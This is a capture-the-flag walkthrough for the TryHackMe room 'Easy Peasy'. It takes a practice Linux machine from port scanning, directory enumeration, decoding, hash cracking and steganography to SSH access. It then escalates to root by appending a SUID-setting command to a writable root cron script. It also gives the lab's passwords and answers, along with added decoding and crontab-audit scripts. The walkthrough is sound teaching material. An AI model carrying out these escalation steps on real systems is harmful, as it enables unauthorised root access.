Laach_

Easy Peasy - THM

Machine Info

Difficulty: Easy🟩
Link: HERE
Avg time: 45 Minutes
OS: Linux

Description: Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.

Task 1

Enumeration starts with nmap.

sudo nmap -Pn -sV -sC -n -T4 -p- -oN scan.txt 10.113.130.85

Three ports are open:

  • 80/tcp - HTTP
  • 6498/tcp - SSH
  • 65524/tcp - HTTP

Question 1

How many ports are open? Answer: 3

Question 2

What is the version of nginx? Answer: 1.16.1

Question 3

What is running on the highest port? Answer: Apache

Task 2

Port 80 serves the nginx default page.

INFO: Feroxbuster was used instead of gobuster, but both commands are provided.

Running:

feroxbuster -u 'http://[IP]' --wordlist /usr/share/dirb/wordlists/common.txt 
# or 
gobuster dir -u 'http://[IP]' -w /usr/share/dirb/wordlists/common.txt

Scan reveals robots.txt, but it contains nothing useful. There is also hidden/, which displays a creepy image. Source code reveals nothing. Ferox also finds hidden/whatever/, which shows a mountain landscape. The page source contains a paragraph with a hidden attribute.

<!DOCTYPE html>
<html>
    <head>
        <title>dead end</title>
        <style>
            body {
                background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
                background-repeat: no-repeat;
                background-size: cover;
                width: 35em;
                margin: 0 auto;
                font-family: Tahoma, Verdana, Arial, sans-serif;
            }
        </style>
    </head>
    <body>
        <center>
            <p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
        </center>
    </body>
</html>

Decoding it with CyberChef gives flag{REDACTED}.

Port 65524 shows the Apache default page. Source code contains another hidden paragraph.

<p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>

The hint suggests a Base encoding. Trying every Base variant in CyberChef shows that only Base62 produces readable output: it decodes to /n0th1ng3ls3m4tt3r. Further down in the same Apache default page HTML, another flag is embedded in the page text.

<li>
    They are activated by symlinking available
    configuration files from their respective
    Fl4g 3 : flag{REDACTED}
    *-available/ counterparts. These should be managed
    by using our helpers
    <tt>
        a2enmod,
        a2dismod,
    </tt>
    <tt>
        a2ensite,
        a2dissite,
    </tt>
    and
    <tt>
        a2enconf,
        a2disconf
    </tt>. See their respective man pages for detailed information.
</li>

Visiting /n0th1ng3ls3m4tt3r shows a page with a 'matrix' image and a hash.

Running john with the provided wordlist fails, most likely because john picks the wrong hash format. To fix this, john is run once for each format that hashid suggested.

for f in Snefru-256 Raw-SHA256 RIPEMD-256 HAVAL-256-3 gost gost-crypto Raw-SHA3-256 skein-256 skein-512-256; do john hash.txt --wordlist=~/Desktop/easypeasy.txt --format=$f ; done

John cracks the hash. The format is GOST, a Russian alternative to SHA256.

The cracked password matches the filename of the image on the page, suggesting steganography. It is used as a passphrase to extract secrettext.txt from the image.

steghide extract -sf binarycodepixabay.jpg

The file contains username boring in plain text and a password in binary.

01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

The binary decodes to iconvertedmypasswordtobinary. Logging in via SSH as boring and reading /home/boring/user.txt reveals the user flag.

User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}

The flag looks like a Caesar or Vigenère cipher. Cipher Identifier identifies it as Caesar. Trying each shift manually, shift 13 decodes it to flag{REDACTED}.

INFO: ROT13 is simply a Caesar cipher with a shift of 13.
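The four decoding steps this walkthrough does by hand (the base64 and Base62 hidden paragraphs from Task 2, the binary octets in secrettext.txt, and the ROT13 user flag) in one script. This is an added example, not code from the original post; the Base62 alphabet is assumed to be CyberChef's default 0-9A-Za-z.

```python
import base64
import codecs

# CyberChef's default Base62 alphabet. Base62 here is plain radix-62
# conversion of the whole byte string read as one big-endian integer.
B62 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def base62_decode(s):
    n = 0
    for ch in s:
        n = n * 62 + B62.index(ch)  # ValueError on a non-alphabet char
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def base62_encode(data):
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 62)
        out = B62[r] + out
    return out or "0"


def guess_base(s):
    """Mirror the 'try every Base variant' step: return every decoder whose
    output is printable ASCII, which is what singled out Base62 on the page."""
    decoders = {"base64": lambda t: base64.b64decode(t, validate=True),
                "base62": base62_decode}
    hits = {}
    for name, fn in decoders.items():
        try:
            out = fn(s)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if out and all(32 <= b < 127 for b in out):
            hits[name] = out.decode("ascii")
    return hits


def binary_octets_to_text(s):
    """Decode the space-separated 8-bit groups found in secrettext.txt."""
    return "".join(chr(int(octet, 2)) for octet in s.split())


def rot13(s):
    """Caesar shift of 13; applying it twice returns the original."""
    return codecs.decode(s, "rot_13")
```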

The room description mentions vulnerable cronjobs, so /etc/crontab is checked.

* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

Root runs .mysecretcronjob.sh every minute. The file is owned by boring and writable, so anything appended to it executes as root; this is used to set the SUID bit on /bin/bash.

The following payload is appended to the script.

echo 'chmod +s /bin/bash' >> /var/www/.mysecretcronjob.sh

After the cronjob fires, running

bash -p

gives a root shell (the -p flag stops bash from dropping the SUID effective UID).
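The misconfiguration here (a root cron job executing a file a non-root user can edit) is easy to catch with an audit. As an added example that is not part of the original post, this script parses /etc/crontab-style lines, resolves relative script names against a leading cd the way the shell does, and flags root jobs whose files are not root-owned or are group/world writable; demo() runs it over a constructed world-writable sample in a temp directory.

```python
import os
import re
import stat
import tempfile

# System crontab line: five schedule fields (or an @special), the user, the command.
CRON_LINE = re.compile(r"^(?:@\S+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
PREFIXES = {"sudo", "bash", "sh", "python", "python3", "perl", "nice", "env"}  # not the script

def script_paths(cmd):
    """Paths a cron command refers to, resolving relative names against a leading
    'cd DIR &&' as the shell does (the room's job is 'cd /var/www/ && sudo bash X')."""
    cwd, found = "/", []
    for part in re.split(r"&&|\|\||;|\|", cmd):
        words = part.split()
        if words[:1] == ["cd"]:
            cwd = words[1] if len(words) > 1 else "/"
            continue
        for w in words:
            if w not in PREFIXES and not w.startswith("-"):
                found.append(os.path.normpath(os.path.join(cwd, w)))
    return found

def writable_by_non_root(path):
    """True if path exists and is not root-owned or is group/world writable."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text):
    """(path, line) for every root job that runs a file a non-root user can edit."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        m = CRON_LINE.match(line)
        if line.startswith("#") or not m or m.group("user") != "root":
            continue
        findings += [(p, line) for p in script_paths(m.group("cmd")) if writable_by_non_root(p)]
    return findings

def demo():
    # Constructed sample: a world-writable script scheduled exactly like the room's job.
    d = tempfile.mkdtemp()
    script = os.path.join(d, ".mysecretcronjob.sh")
    open(script, "w").write("#!/bin/bash\n")
    os.chmod(script, 0o666)
    return audit_crontab(f"* *    * * *   root    cd {d} && sudo bash .mysecretcronjob.sh\n")
```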

Question 1

Using GoBuster, find flag 1. Answer: flag{REDACTED}

Question 2

Further enumerate the machine, what is flag 2? Answer: flag{REDACTED}

Question 3

Crack the hash with easypeasy.txt, What is the flag 3? Answer: flag{REDACTED}

Question 4

What is the hidden directory? Answer: /n0th1ng3ls3m4tt3r (PEAK Reference to Metallica)

Question 5

Using the wordlist that provided to you in this task crack the hash what is the password? Answer: mypasswordforthatjob

Question 6

What is the password to login to the machine via SSH? Answer: iconvertedmypasswordtobinary

Question 7

What is the user flag? Answer: flag{REDACTED}

Question 8

What is the root flag? Answer: flag{REDACTED}
